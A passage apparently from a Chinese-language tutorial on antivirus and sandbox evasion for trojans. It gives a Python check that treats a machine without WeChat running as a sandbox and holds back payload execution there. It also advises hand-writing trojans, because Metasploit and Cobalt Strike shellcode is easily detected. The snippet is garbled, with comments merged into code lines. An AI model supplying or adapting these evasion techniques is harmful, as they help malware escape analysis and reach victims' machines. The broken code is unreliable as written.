//获取使用的内存大小
通过判断一些程序来反沙箱
有些沙箱里是不会安装日常使用的软件,我们可以通过这个点来反沙箱,这里以微信程序为例
list = popen("cmd /c tasklist").read()
//运行tasklist命令,并获取输出的内容for i in list.split('\n'):
//遍历获取的内容if "WeChat.exe" in i:sandbox = 1if(sandbox == 1)://需要执行的代码else:print("no sandbox")
总结
绕过沙箱的方法还有很多,但是查系统状态也是敏感行为,不过不用担心
总结
其实还可以使用第三方工具进行免杀,但是这种方法太过脚本小子,工具的特征过不了多久就会被杀软发现,最好还是掌握自己写代码免杀的技巧
可以尝试不同的软件对python程序打包exe
msf和cs生成的shellcode代码特征太明显了,自己写木马的话,免杀就会轻松很多,这里只是一些静态过木马的知识,之后会继续写动态过免杀以及制作木马的文章